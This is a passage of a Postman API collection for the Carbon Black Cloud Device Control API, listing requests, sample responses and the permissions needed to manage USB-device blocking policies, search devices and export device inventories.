CSV","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/download"},"status":"OK","code":200,"_postman_previewlanguage":"plain","header":[{"key":"x-amz-id-2","value":"RzHhUGU4mX8bxOB8jgIS5wwrB1bEsXWz//qPCDJUylRldS44W5beYU+g/t9SB8Bro27ZVRasgF0="},{"key":"x-amz-request-id","value":"1EPQSTAF841PDV21"},{"key":"Date","value":"Thu, 13 Jul 2023 16:15:38 GMT"},{"key":"Last-Modified","value":"Thu, 13 Jul 2023 16:15:17 GMT"},{"key":"x-amz-expiration","value":"expiry-date=\"Sun, 13 Aug 2023 00:00:00 GMT\", rule-id=\"JobOutputCleanup\""},{"key":"ETag","value":"\"7afa83be7a4ec55e321e1f04e6f94e9e\""},{"key":"x-amz-server-side-encryption","value":"AES256"},{"key":"Accept-Ranges","value":"bytes"},{"key":"Content-Type","value":"text/csv"},{"key":"Server","value":"AmazonS3"},{"key":"Content-Length","value":"3143"}],"cookie":[],"responseTime":null,"body":"Vendor Name,Vendor ID,Product Name,Product ID,Serial Number,Notes,Approval Name,Created At,Updated At,Updated By\nSanDisk,0x0781,Ultra,0x5581,12345678900987600000,Approval Note,name_for approval,2020-11-05T23:51:56.396425Z,2020-11-06T23:51:56.396425Z,admin@sample.com\nSanDisk,0x0781,Ultra,0x5581,09876543212345678909876543211,Another Note,off_network_os_transfer,2020-11-07T23:51:56.396425Z,2020-11-09T23:51:56.396425Z,admin@sample.com"}],"_postman_id":"bd112d81-a040-4957-97eb-3935cf594a94"}],"id":"4475f6a9-bad2-41e6-afdd-b2e66ae167da","_postman_id":"4475f6a9-bad2-41e6-afdd-b2e66ae167da","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}}},{"name":"Blocks","item":[{"name":"Bulk Create Blocks","id":"49730407-141f-49a1-9ae5-34b77079eeec","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"policy_id\": \"String\",\n        \"windows\": {\n            \"approved_devices\": {\n                \"allow_write\": false,\n                \"allow_execute\": false\n            }\n        }\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/blocks/_bulk","description":"<p>Creates blocking rules by policy.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>UPDATE</td>\n</tr>\n<tr>\n<td>external-device.enforce</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#bulk-create-blocks\">See Documentation</a></p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">[\n    {\n        \"policy_id\": \"&lt;string&gt;\",\n        \"windows\": {\n            \"approved_devices\": {\n                \"allow_write\": &lt;boolean&gt;,\n                \"allow_execute\": &lt;boolean&gt;\n            }\n        }\n    }\n]\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","blocks","_bulk"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"2e68eee1-d832-44df-9523-dc90e7ba1f2d","name":"Bulk Create Blocks","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"policy_id\": \"12345678\",\n        \"windows\": {\n            \"approved_devices\": {\n                \"allow_write\": false,\n                \"allow_execute\": false\n            }\n        }\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/blocks/_bulk"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 11 Dec 2023 22:35:28 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"168"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"}],"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"id\": \"07b64fc9-633b-39b4-a905-16eb021f376a\",\n            \"policy_id\": \"12345678\",\n            \"created_at\": \"2023-12-11T21:49:00Z\",\n            \"updated_at\": \"2023-12-11T22:22:02Z\",\n            \"windows\": {\n                \"approved_devices\": {\n                    \"allow_write\": false,\n                    \"allow_execute\": true\n                }\n            }\n        }\n    ]\n}"}],"_postman_id":"49730407-141f-49a1-9ae5-34b77079eeec"},{"name":"Get Block by ID","id":"d4597a6d-2534-46b5-8f38-f5c6a7bfccfb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/blocks/{{cb_device_control_id}}","description":"<p>Returns a specific policy_id where blocking is enabled, requested using the ID of the block.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#get-block-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","blocks","{{cb_device_control_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"2289c9af-00ce-489b-9eb9-57af52c85c93","name":"Get Block by ID","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/blocks/{{cb_device_control_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 11 Dec 2023 22:30:03 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"159"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"07b64fc9-633b-39b4-a905-16eb021f376a\",\n    \"policy_id\": \"12345678\",\n    \"created_at\": \"2023-12-11T21:49:00Z\",\n    \"updated_at\": \"2023-12-11T22:22:02Z\",\n    \"windows\": {\n        \"approved_devices\": {\n            \"allow_write\": false,\n            \"allow_execute\": true\n        }\n    }\n}"}],"_postman_id":"d4597a6d-2534-46b5-8f38-f5c6a7bfccfb"},{"name":"Get Blocks","id":"7d214e39-276d-4f7c-bba5-359c69fa200c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/blocks","description":"<p>Returns all policy_ids where Device Control Blocking is enabled, for a specific org.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#get-blocks\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","blocks"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"732511ae-4b13-4175-9b90-9da5114ce4c6","name":"Get Blocks","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/blocks"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 11 Dec 2023 22:28:05 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"456"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"}],"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"id\": \"09f690a5-0ec2-33e6-9109-06832497363e\",\n            \"policy_id\": \"98765432\",\n            \"created_at\": \"2023-08-29T05:15:47Z\",\n            \"updated_at\": \"2023-11-07T09:31:01Z\",\n            \"windows\": {\n                \"approved_devices\": {\n                    \"allow_write\": false,\n                    \"allow_execute\": false\n                }\n            }\n        },\n        {\n            \"id\": \"b8e33d0c-8d6b-3e67-bab9-bb3dbfb53722\",\n            \"policy_id\": \"45678901\",\n            \"created_at\": \"2023-11-17T08:44:26Z\",\n            \"updated_at\": \"2023-12-11T09:20:03Z\",\n            \"windows\": {\n                \"approved_devices\": {\n                    \"allow_write\": true,\n                    \"allow_execute\": false\n                }\n            }\n        },\n        {\n            \"id\": \"f2300941-ac43-3a0a-b2f1-bf01a77b36f2\",\n            \"policy_id\": \"34567890\",\n            \"created_at\": \"2023-10-27T06:42:49Z\",\n            \"updated_at\": \"2023-10-27T06:43:01Z\",\n            \"windows\": {\n                \"approved_devices\": {\n                    \"allow_write\": true,\n                    \"allow_execute\": true\n                }\n            }\n        },\n        {\n            \"id\": \"25aec0d3-12d3-3fce-8725-122d9650364e\",\n            \"policy_id\": \"12345678\",\n            \"created_at\": \"2023-09-14T09:04:41Z\",\n            \"updated_at\": \"2023-12-01T08:48:02Z\",\n            \"windows\": {\n                \"approved_devices\": {\n                    \"allow_write\": false,\n                    \"allow_execute\": true\n                }\n            }\n        }\n    ]\n}"}],"_postman_id":"7d214e39-276d-4f7c-bba5-359c69fa200c"},{"name":"Delete Block by ID","id":"86c0c8ad-0957-41d9-88af-19b8b85bc426","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/blocks/{{cb_device_control_id}}","description":"<p>Returns all policy_ids where Device Control Blocking is enabled, for a specific org.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#get-blocks\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","blocks","{{cb_device_control_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"86c0c8ad-0957-41d9-88af-19b8b85bc426"},{"name":"Update Block","id":"b0b05105-03ae-48db-b35a-d4c1cdfd0726","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"id\": \"{{cb_device_control_id}}\",\n    \"windows\": {\n        \"approved_devices\": {\n            \"allow_write\": true,\n            \"allow_execute\": false\n        }\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/blocks/{{cb_device_control_id}}","description":"<p>Update a specific block, for example to change whether approved windows devices allow write or not.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>UPDATE</td>\n</tr>\n<tr>\n<td>external-device.enforce</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/\">See Documentation</a></p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"id\": \"&lt;string&gt;\",\n    \"windows\": {\n        \"approved_devices\": {\n            \"allow_write\": &lt;boolean&gt;,\n            \"allow_execute\":&lt;boolean&gt;         }\n    }\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","blocks","{{cb_device_control_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"aa15d021-ee75-4a5d-91f3-220d1e492b3f","name":"Update Block","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n    \"id\": \"{{cb_device_control_id}}\",\n    \"windows\": {\n        \"approved_devices\": {\n            \"allow_write\": true,\n            \"allow_execute\": false\n        }\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/blocks/{{cb_device_control_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 11 Dec 2023 23:49:41 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"158"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"07b64fc9-633b-39b4-a905-16eb021f376a\",\n    \"policy_id\": \"12345678\",\n    \"created_at\": \"2023-12-11T21:49:00Z\",\n    \"updated_at\": \"2023-12-11T23:49:41Z\",\n    \"windows\": {\n        \"approved_devices\": {\n            \"allow_write\": true,\n            \"allow_execute\": false\n        }\n    }\n}"}],"_postman_id":"b0b05105-03ae-48db-b35a-d4c1cdfd0726"}],"id":"91f6c5d9-9d3d-46e8-bdb9-719f06333023","_postman_id":"91f6c5d9-9d3d-46e8-bdb9-719f06333023","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}}},{"name":"USB Devices","item":[{"name":"Get USB Device by ID","id":"6d97ccf7-0c68-4944-8c29-efe29a43181c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/devices/{{cb_device_control_device_id}}","description":"<p>Returns a specific USB device.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#get-usb-device-by-id\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","devices","{{cb_device_control_device_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6d97ccf7-0c68-4944-8c29-efe29a43181c"},{"name":"Get Endpoints associated with a USB device","id":"b32de682-91bd-47ee-81fa-35734523bc69","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/devices/{{cb_device_control_device_id}}/endpoints","description":"<p>Returns endpoints associated with a USB device.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#get-endpoints-associated-with-a-usb-device\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","devices","{{cb_device_control_device_id}}","endpoints"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"b32de682-91bd-47ee-81fa-35734523bc69"},{"name":"Search USB Devices","id":"c5343cb0-0a2f-49bf-9ffe-476b6df8332f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"endpoint.endpoint_name\": [ \"<string>\" ],\n    \"product_name\": [ \"<string>\" ],\n    \"serial_number\": [ \"<string>\" ],\n    \"status\": [ \"<string>\" ],\n    \"vendor_name\": [ \"<string>\" ]\n  },\n  \"query\": \"<string>\",\n  \"rows\": 0,\n  \"start\": 0,\n  \"sort\": [\n    {\n      \"field\": \"<string>\",\n      \"order\": \"<string>\"\n    }\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/devices/_search","description":"<p>Search USB devices your organization has seen.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#search-usb-devices\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","devices","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"730721f3-fca9-48ab-a872-a83f409456ec","name":"Search USB Devices","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"vendor_name\": [ \"SanDisk\" ]\n  },\n  \"rows\": 10,\n  \"start\": 0,\n  \"sort\": [\n    {\n      \"field\": \"vendor_name\",\n      \"order\": \"ASC\"\n    }\n  ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/devices/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 12 Dec 2023 00:57:55 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"353"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Encoding","value":"br"},{"key":"Vary","value":"Accept-Encoding"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 1,\n    \"num_available\": 4,\n    \"results\": [\n        {\n            \"id\": \"f8027edd-cd1e-384d-8af9-a2458b6e1022\",\n            \"first_seen\": \"2023-07-27T06:36:29Z\",\n            \"last_seen\": \"2023-08-28T09:51:05Z\",\n            \"vendor_name\": \"SanDisk\",\n            \"vendor_id\": \"0x0781\",\n            \"product_name\": \"Cruzer Blade\",\n            \"product_id\": \"0x5567\",\n            \"serial_number\": \"12345678900F3CB27581\",\n            \"last_endpoint_name\": \"Demo-Win\",\n            \"last_endpoint_id\": 121212121,\n            \"last_policy_id\": 12345678,\n            \"endpoint_count\": 2,\n            \"device_friendly_name\": \"SanDisk Cruzer Blade USB Device\",\n            \"device_name\": \"\\\\Device\\\\HarddiskVolume15\",\n            \"created_at\": \"2023-07-27T06:38:06Z\",\n            \"updated_at\": \"2023-08-28T09:52:04Z\",\n            \"status\": \"APPROVED\"\n        }\n    ]\n}"}],"_postman_id":"c5343cb0-0a2f-49bf-9ffe-476b6df8332f"},{"name":"Export USB Devices Inventory","id":"30c2c0ba-b6e0-4e53-9fdd-f062fbd530c7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"endpoint.endpoint_name\": [ \"<string>\" ],\n    \"product_name\": [ \"<string>\" ],\n    \"serial_number\": [ \"<string>\" ],\n    \"status\": [ \"<string>\" ],\n    \"vendor_name\": [ \"<string>\" ]\n  },\n  \"query\": \"<string>\",\n  \"rows\": <integer>,\n  \"sort\": [\n    {\n      \"field\": \"<string>\",\n      \"order\": \"<string>\"\n    }\n  ],\n  \"start\": <integer>,\n  \"format\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/devices/_export","description":"<p>Export device data from the specified organization in a specified format, either csv or json.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#export-usb-devices-inventory\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","id":"aaa0f779-9578-45d9-ac9c-ae1fe871b0bb","name":"Device Control API 🗝","type":"folder"}},"urlObject":{"path":["device_control","v3","orgs","{{cb_org_key}}","devices","_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"75a83959-ea12-4f14-a1ee-6efafb21a71b","name":"Export USB Devices Inventory","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"vendor_name\": [\n      \"SanDisk\"\n    ]\n  },\n  \"format\": \"CSV\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/devices/_export"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Content-Type","value":"application/json","description":""}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": 123456\n}"},{"id":"58ee9861-7b39-4228-a9fb-926c41cb1c88","name":"Job Service: Get Results in CSV of Export USB Devices Inventory","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/download"},"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":"Device Name,Device Friendly Name,Device Serial Number,Device type,Vendor Name,Vendor ID,Product Name,Product ID,Endpoint Name,Endpoint ID,First Seen,Last Seen,Approval Status\n\\Device\\HarddiskVolume10,SanDisk Cruzer Blade USB Device,ABCDE123450330115260,EXTERNAL_DEVICE_TYPE_DISK,SanDisk,0x0781,Cruzer Blade,0x5567,DESKTOP-DEMO,123456789,2023-03-02 09:55:54.283263 +0000 +0000,2023-03-02 10:21:03.289 +0000 +0000,UNAPPROVED\n\\Device\\HarddiskVolume19,SanDisk Dual Drive USB Device,67890FGHIJ0831102432,EXTERNAL_DEVICE_TYPE_DISK,SanDisk,0x0781,Dual Drive,0x559D,DESKTOP-TEST,123456789,2023-03-02 10:46:46.667123 +0000 +0000,2023-03-02 13:59:57.221596 +0000 +0000,APPROVED"},{"id":"54b408d1-1a93-4835-8c35-c8e330a592d9","name":"Job Service: Get Results in JSON of Export USB Devices Inventory","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"}],"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/{{cb_job_id}}/download"},"_postman_previewlanguage":"json","header":[{"key":"Content-Type","value":"application/json","description":""}],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"device_name\": \"\\\\Device\\\\HarddiskVolume10\",\n        \"device_friendly_name\": \"SanDisk Cruzer Blade USB Device\",\n        \"device_serial_number\": \"ABCDE123450330115260\",\n        \"device_type\": \"EXTERNAL_DEVICE_TYPE_DISK\",\n        \"vendor_name\": \"SanDisk\",\n        \"vendor_id\": \"0x0781\",\n        \"product_name\": \"Cruzer Blade\",\n        \"product_id\": \"0x5567\",\n        \"endpoint_name\": \"DESKTOP-DEMO\",\n        \"endpoint_id\": 123456789,\n        \"first_seen\": \"2023-03-02T09:55:54.283263Z\",\n        \"last_seen\": \"2023-03-02T10:21:03.289Z\",\n        \"approval_status\": \"UNAPPROVED\"\n    },\n    {\n        \"device_name\": \"\\\\Device\\\\HarddiskVolume19\",\n        \"device_friendly_name\": \"SanDisk Dual Drive USB Device\",\n        \"device_serial_number\": \"67890FGHIJ0831102432\",\n        \"device_type\": \"EXTERNAL_DEVICE_TYPE_DISK\",\n        \"vendor_name\": \"SanDisk\",\n        \"vendor_id\": \"0x0781\",\n        \"product_name\": \"Dual Drive\",\n        \"product_id\": \"0x559D\",\n        \"endpoint_name\": \"DESKTOP-RFK20J7\",\n        \"endpoint_id\": 123456789,\n        \"first_seen\": \"2023-03-02T10:46:46.667123Z\",\n        \"last_seen\": \"2023-03-02T13:59:57.221596Z\",\n        \"approval_status\": \"APPROVED\"\n    }\n]"}],"_postman_id":"30c2c0ba-b6e0-4e53-9fdd-f062fbd530c7"},{"name":"Facet USB Devices","id":"5cf73ae9-56c8-4c34-8c8e-92ba27f3597e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"endpoint.endpoint_name\": [ \"<string>\" ],\n    \"product_name\": [ \"<string>\" ],\n    \"serial_number\": [ \"<string>\" ],\n    \"status\": [ \"<string>\" ],\n    \"vendor_name\": [ \"<string>\" ]\n  },\n  \"query\": \"<string>\",\n  \"terms\": {\n    \"fields\": [ \"<string>\" ],\n    \"rows\": 0\n  }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/device_control/v3/orgs/{{cb_org_key}}/devices/_facet","description":"<p>Facet USB devices your organization has seen.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>external-device.manage</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-defense/latest/device-control-api/#facet-usb-devices\">See 